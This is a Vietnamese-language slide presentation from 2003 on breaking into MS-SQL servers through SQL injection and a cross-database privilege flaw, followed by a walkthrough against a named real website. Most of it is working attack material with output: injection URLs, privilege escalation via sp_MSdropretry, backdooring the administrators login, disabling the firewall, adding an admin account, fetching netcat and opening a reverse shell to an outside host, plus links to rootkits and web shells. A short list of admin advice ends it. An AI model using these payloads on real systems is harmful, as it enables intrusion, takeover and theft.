XÂM NHẬP MÁY CHỦ MS-SQL QUA LỖI SQL-INJECTION & CROSS-DATABASE
Cập nhật lúc 10:55, Thứ Sáu, 03/10/2003 (GMT+7)
PHẦN I: CÁC KĨ THUẬT HACK
TRONG SQL
• sql-injection
• convert-magic
• cross-database
PHÁT HIỆN LỖI SQL-INJECTION
http://www.company.com/product/price.asp?id=1
select price from product where id=1
http://www.company.com/product/price.asp?id=1’
select price from product where id=1’
Unclosed quotation mark before the character string ‘
http://www.company.com/product/price.asp?id=[...]
KĨ THUẬT CONVERT-MAGIC
http://wwww.company.com/product/price.asp?id=1 and 1=convert(int,@@version) --sp_password
select price from product where id=1 and 1=convert(int,@@version)--sp_password
KĨ THUẬT CONVERT-MAGIC
Syntax error converting the nvarchar value 'Microsoft SQL Server 7.00 - 7.00.623 (Intel X86) Nov 23 1998 21:08:09 Copyright (c) 1988-1998 Microsoft Corporation Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 3)' to a column of data type int.
KĨ THUẬT CONVERT-MAGIC
'sp_password' was found in the text of this event.-- The text has been replaced with this comment for security reasons.
• @@servername, db_name(), system_user, ...
• ‘ “ ( )
LỖI CROSS-DATABASE CỦA MS-SQL
use testdatabase
create proc dbo.test as select * from master.dbo.sysxlogins
go
exec test
select * from master.dbo.sysxlogins
• sa == dbo
• db_owner có thể create & design các object của dbo
• SID của proc dbo.test == SID của master.dbo.sysxlogins
LỖI INJECTION CỦA MASTER..SP_MSDROPRETRY
CREATE PROCEDURE sp_MSdropretry
(@tname sysname, @pname sysname)
as
declare @retcode int
/*
** To public
*/
exec ('drop table ' + @tname)
if @@ERROR <> 0 return(1)
exec ('drop procedure ' + @pname)
if @@ERROR <> 0 return(1)
return (0)
NÂNG QUYỀN QUA MASTER..SP_MSDROPRETRY
exec sp_executesql N'create view dbo.test as select * from master.dbo.sysusers'
exec sp_msdropretry 'xx update sysusers set sid=0x01 where name=''dbo''','xx'
exec sp_msdropretry 'xx update dbo.test set sid=0x01,roles=0x01 where name=''guest''','xx'
exec sp_executesql N'drop view dbo.test‘
drop table xx update sysusers set sid=0x01 where name='dbo' drop procedure xx
drop table xx update dbo.test set sid=0x01,roles=0x01 where name=guest drop table xx
• guest == db_owner của database master
PHẦN 2: MINH HỌA HACK SQL
• Khai thác lỗi sql-injection tại nhaxinh.com.vn
• Một số kinh nghiệm khi hack SQL
LỖI SQL-INJECTION TẠI NHAXINH.COM.VN
• dùng “proxy.ia2.marketscore.com:80” ðể tránh bị ghi nhật kí
http://www.nhaxinh.com.vn/FullStory.asp?id=1
http://www.nhaxinh.com.vn/FullStory.asp?id=1’
LỖI SQL-INJECTION TẠI NHAXINH.COM.VN
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBCSQLServerDriver] [SQLServer]
Unclosed quotation mark before the character string ''.
/Including/general.asp, line 840\
XÁC ĐỊNH VERSION
http://www.nhaxinh.com.vn/FullStory.asp?id=1 and 1=convert(int,@@version)--
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]
XÁC ĐỊNH VERSION
[SQL Server]Syntax error converting the nvarchar value 'Microsoft SQL Server 7.00 - 7.00.1063 (Intel X86) Apr 9 2002 14:18:16 Copyright (c) 1988-2002 Microsoft Corporation Enterprise Edition on Windows NT 5.0 (Build 2195: Service Pack 4) ' to a column of data type int.
/Including/general.asp, line 840
XÁC ĐỊNH SERVER_NAME
http://www.nhaxinh.com.vn/FullStory.asp?id=1 and 1=convert(int,@@servername)--
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'UNESCO' to a column of data type int.
/Including/general.asp, line 840
XÁC ĐỊNH DATABASE_NAME
http://www.nhaxinh.com.vn/FullStory.asp?id=1 and 1=convert(int,db_name())--
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'NhaXinh' to a column of data type int.
/Including/general.asp, line 840
XÁC ĐỊNH USER_NAME
http://www.nhaxinh.com.vn/FullStory.asp?
id=1 and 1=convert(int,system_user)--
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'nhaxinh' to a column of data type int.
/Including/general.asp, line 840
• user_name(): các member của “sysadmin” được map sang “dbo”
XÁC ĐỊNH MỨC QUYỀN CỦA SQL SERVER
http://www.nhaxinh.com.vn/FullStory.asp?id=1;select * from openrowset('sqloledb','';;,'')--
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server] Ad hoc access to OLE DB provider 'sqloledb' has been denied. You must access this provider through a linked server.
/Including/general.asp, line 840
• admin đã disable openrowset/sqloledb, sẽ enable lại sau
ĐƯA GUEST VÀO DB_OWNER CỦA DATABASE MASTER1
http://www.nhaxinh.com.vn/FullStory.asp?id=1;exec sp_executesql N'create view dbo.test as select * from master.dbo.sysusers' exec sp_msdropretry 'xx update sysusers set sid=0x01 where name=''dbo''','xx' exec sp_msdropretry 'xx update dbo.test set sid=0x01,roles=0x01 where name=''guest''','xx' exec sp_executesql N'drop view dbo.test'--
• Tại sao? guest là db_owner của database master nên guest có thể thi hành xp_regwrite hoặc xp_cmdshell
XÁC NHẬN GUEST ĐÃ NẰM TRONG DB_OWNER CỦA DATABASE MASTER CHƯA ?
http://www.nhaxinh.com.vn/FullStory.asp?id=1 and 1=convert(int,(select top 1 name from master..sysusers where roles=0x01 and name not in('dbo')))--
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'guest' to a column of data type int.
/Including/general.asp, line 840
CÀI CỬA SAU “BUILTIN\ADMINISTRATORS”
http://www.nhaxinh.com.vn/FullStory.asp?id=1;exec sp_executesql N'create view dbo.test as select * from master.dbo.sysxlogins' exec sp_msdropretry 'xx update sysusers set sid=0x01 where name=''dbo''','xx' exec sp_msdropretry 'xx update dbo.test set xstatus=18 where name=''BUILTIN\ADMINISTRATORS''','xx' exec sp_executesql N'drop view dbo.test'--
• login vào database với username là “BUILTIN\ADMINISTRATORS” mà không cần password
TẠI SAO KHÔNG ADD THẲNG USER “NHAXINH” VÀO SYSADMIN?
exec master..sp_addsrvrolemember 'nhaxinh',sysadmin
• Lỗi: Invalid object name ‘XXXX’ khi vấn tin CSDL sau này
ENABLE OPENROWSET/OLEDB & XÁC ĐỊNH LẠI MỨC QUYỀN CỦA SQL SERVER
http://www.nhaxinh.com.vn/FullStory.asp?id=1;exec master..xp_regwrite HKEY_LOCAL_MACHINE,'SOFTWARE\Microsoft\MSSQLServer\Providers\SQLOLEDB','AllowInProcess',REG_DWORD,1 exec master..xp_regwrite HKEY_LOCAL_MACHINE,'SOFTWARE\Microsoft\MSSQLServer\Providers\SQLOLEDB','DisallowAdhocAccess',REG_DWORD,0—
ENABLE OPENROWSET/OLEDB & XÁC ĐỊNH LẠI MỨC QUYỀN CỦA SQL SERVER
http://www.nhaxinh.com.vn/FullStory.asp?id=1;select * from openrowset('sqloledb','';;,'')--
Microsoft OLE DB Provider for ODBC Drivers error '80004005'
[Microsoft][ODBC SQL Server Driver][SQL Server]Login failed for user 'SYSTEM'.
/Including/general.asp, line 840
DISABLE FIREWALL CỦA NT & TẮT LOG TRONG SQL
http://www.nhaxinh.com.vn/FullStory.asp?id=1;exec master..xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Services\Tcpip\Parameters','EnableSecurityFilters'—
DISABLE FIREWALL CỦA NT & TẮT LOG TRONG SQL
http://www.nhaxinh.com.vn/FullStory.asp?id=1;exec master..xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Services\Tcpip\Parameters','EnableSecurityFilters'—
LỖI KHI ENABLE MASTER..XP_CMDSHELL & “ALLOW UPDATES”
http://www.nhaxinh.com.vn/FullStory.asp?id=1;select * from openrowset('sqloledb', 'server=UNESCO;uid=BUILTIN\Administrators;pwd=', 'set fmtonly off exec master..sp_addextendedproc xp_cmd,''xpsql70.dll'' exec sp_configure ''allow updates'', ''1'' reconfigure with override')—
LỖI KHI ENABLE MASTER..XP_CMDSHELL & “ALLOW UPDATES”
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Could not process object 'set fmtonly off master..sp_addextendedproc xp_cmd 'xpsql70.dll' exec sp_configure 'allow updates', '1' reconfigure with override'. The OLE DB provider 'sqloledb' indicates that the object has no columns.
/Including/general.asp, line 840
THÊM DÒNG “SELECT 1” ĐỂ KHẮC PHỤC LỖI
http://www.nhaxinh.com.vn/FullStory.asp?id=1;select * from openrowset('sqloledb', 'server=UNESCO;uid=BUILTIN\Administrators;pwd=', 'set fmtonly off select 1 exec master..sp_addextendedproc xp_cmd,''xpsql70.dll'' exec sp_configure ''allow updates'', ''1'' reconfigure with override')--
• set “allow updates”=1 cho phép update các “system-table” (sysusers, syslogins,...) trực tiếp, không qua các “system-procedure”
CHÚ Ý KHI CHẠY MASTER..XP_CMDSHELL
• exec master..xp_cmdshell ‘dir c:\’ -- “SQLAgentCmdExec”
• select * from openrowset('sqloledb', 'server=;uid=BUILTIN\Administrators;pwd=', 'set fmtonly off select 1 exec master..xp_cmdshell "dir c:\"') -- “NT AUTHORITY\SYSTEM”
XÁC ĐỊNH IP CỦA SERVER
http://www.nhaxinh.com.vn/FullStory.asp?id=1;drop table t create table t(a int identity,b varchar(1000)) insert into t exec master..xp_cmdshell 'ipconfig'--
http://www.nhaxinh.com.vn/FullStory.asp?id=1 and 1=convert(int,(select top 1 b from t where b like '%25IP Address%25'))-- (%25 == “%”)
XÁC ĐỊNH IP CỦA SERVER
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value ' IP Address. . . . . . . . . . . . : 203.162.7.70 ' to a column of data type int.
/Including/general.asp, line 840
DO THÁM IP “203.162.7.70”
C:\> ping 203.162.7.70
Pinging 203.162.7.70 with 32 bytes of data:
Reply from 203.162.7.70: bytes=32 time=232ms TTL=118
C:\> ftp 203.162.7.70
Connected to 203.162.7.70.
220 unesco Microsoft FTP Service (Version 5.0).
User (203.162.7.70:(none)):
• 203.162.7.70 == panvietnam.com
FTP TRỰC TIẾP - THẤT BẠI !
http://www.nhaxinh.com.vn/FullStory.asp?id=1;select * from openrowset('sqloledb', 'server=UNESCO;uid=BUILTIN\Administrators;pwd=', 'set fmtonly off select 1 exec xp_cmdshell "net user a /add %26 net localgroup administrators a /add"')-- (%26 == “&”)
FTP TRỰC TIẾP - THẤT BẠI !
C:\> ftp 203.162.7.70
Connected to 203.162.7.70.
220 unesco Microsoft FTP Service
(Version 5.0).
User (203.162.7.70:(none)): a
331 Password required for a.
Password:
530 User a cannot log in.
Login failed.
ftp> bye
UPLOAD NETCAT LÊN SERVER
http://www.nhaxinh.com.vn/FullStory.asp?id=1;select * from openrowset('sqloledb', 'server=UNESCO;uid=BUILTIN\Administrators;pwd=', 'set fmtonly off select 1 exec master..xp_cmdshell "echo open a.b.c.d %3Ef %26 echo user a a %3E%3Ef %26 echo bin %3E%3Ef %26 echo cd a %3E%3Ef %26 echo mget * %3E%3Ef %26 echo quit %3E%3Ef %26 ftp -v -i -n -s%3Af" %26 del f')-- (%3E == “>”)
UPLOAD NETCAT LÊN SERVER
echo open a.b.c.d >f
echo user a a >>f
echo bin >> f
echo cd a >>f
echo mget * >>f
echo quit >>f
ftp -v -i -n -s:f
del f
THẨM TRA XEM NETCAT ĐÃ ĐƯỢC UPLOAD THÀNH CÔNG CHƯA ?
http://www.nhaxinh.com.vn/FullStory.asp?id=1;drop table t create table t(a int identity,b varchar(1000)) insert into t exec master..xp_cmdshell 'dir nx.exe'--
http://www.nhaxinh.com.vn/FullStory.asp?id=1 and 1=convert(int,(select b from t where a=1))--
http://www.nhaxinh.com.vn/FullStory.asp?id=1 and 1=convert(int,(select b from t where a=6))—
THẨM TRA XEM NETCAT ĐẴ ĐƯỢC UPLOAD THÀNH CÔNG CHƯA ?
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value '08/17/2003 11:31a 11,776 nx.exe' to a column of data type int.
/Including/general.asp, line 840
NỐI NETCAT NGHỊCH CHUYỂN RA NGOÀI
http://www.nhaxinh.com.vn/FullStory.asp?id=1;select * from openrowset('sqloledb', 'server=UNESCO;uid=BUILTIN\Administrators;pwd=', 'set fmtonly off select 1 exec xp_cmdshell "nx -d -e cmd a.b.c.d 8080"')--
C:\WINNT.SBS\system32>nx -vv -l -p 8080
listening on [any] 8080 ...
NỐI NETCAT NGHỊCH CHUYỂN RA NGOÀI
203.162.7.70: inverse host lookup failed: h_errno 11004: NO_DATA
connect to [a.b.c.d] from (UNKNOWN) [203.162.7.70] 3343: NO_DATA
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>_
NÊN CÀI CỬA SAU NÀO CHO SHELL ?
• Hacker Defender - http://rootkit.host.sk
• TYT - http://www.nhomvicki.net/tmp/tyt0.zip
• yyt_hac's ntrootkit - http://www.yythac.com
• WinShell - http://www.janker.org
• ... (http://www.ttian.net)
NÊN CÀI CỬA SAU NÀO CHO WEB ?
• 4in1.asp - http://www.nhomvicki.net/tmp/4in1.asp
• ntaddy.asp
C:\> net localgroup administrators IWAM_UNESCO /add
The command completed successfully.
C:\> iisreset
Attempting stop...
Internet services successfully stopped
Attempting start...
Internet services successfully restarted
(IIS bây giờ sẽ chạy với mức quyền Administrators)
LỜI KHUYÊN CHO ADMIN CỦA NETNAM.VN
• Thiết lập tường lửa mạnh cho NT
• Dùng chương trình “fport.exe” để phát hiện cửa sau
• Ðắp bản patch mới nhất cho MS-SQL
• Hiệu chỉnh file “%SystemRoot%\Help\iisHelp\common\500-100.asp”
• Sửa lỗi cho các file .asp bị dính sql-injection
• Xem nhật kí của IIS định kì
,